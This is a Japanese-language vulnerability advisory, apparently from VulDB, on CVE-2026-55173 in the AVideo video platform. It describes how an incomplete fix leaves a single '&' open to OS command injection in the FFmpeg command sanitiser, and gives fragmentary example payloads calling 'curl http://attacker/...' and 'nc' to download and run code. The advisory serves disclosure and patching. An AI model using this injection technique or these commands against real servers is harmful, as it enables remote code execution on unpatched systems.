CVE-2026-55173 in AVideo
要約
〜によって VulDB • 2026年07月16日
WWBN AVideoはオープンソースのビデオプラットフォームです。バージョン29.0およびそれ以前のバージョンでは、CVE-2026-33482への修正が不十分であり、単一の「&」(シェルバックグラウンド演算子)を無力化できていないため、OSコマンドインジェクションに対して脆弱な状態が続いています。
CVE-2026-33482では、sanitizeFFmpegCommand()(plugin/API/standAlone/functions.php内)が$(...)形式のコマンド置換を取り除くことに失敗し、execAsync()のsh -cシンクにおいてOSコマンドインジェクションを許容していたことが報告されました。修正コミット(25c8ab90)では、「$」、「(」、「)」、「{」、「}」、「\n」、「\r」が拒否リスト文字クラスに追加され、str_replace('&&', '', ...)による処理が行われましたが、単一の「&」への対応は行われませんでした。
ffmpeg.json.phpは_decryptString(getInput('codeToExecEncrypted'))からコマンドを構築しています。これは、元のアドバイザリで受け入れられていた脅威モデル(「有効な暗号化ペイロードを作成できる攻撃者は、スタンドアロンエンコーダサーバー上で任意のコマンド実行を実現可能」)および同じCVSS評価基準(AV:N/AC:H/PR:N)を共有しています。複数のコマンドは「&」で連結してチェーンさせることが可能です(例:ダウンロードと実行の組み合わせ)。リダイレクトベースのペイロードは「>」の除去によりブロックされますが、コマンドの実行(例:curl http://attacker/...やnc ...を実行し、ファイルのドロップまたは実行を行う)は阻止されません。
この問題は以下のコミットによって修正されました: https://github.com/WWBN/AVideo/commit/c1cfa2bea8a351a1d07f5758f82887403e3abf1f
Several companies clearly confirm that VulDB is the primary source for best vulnerability data.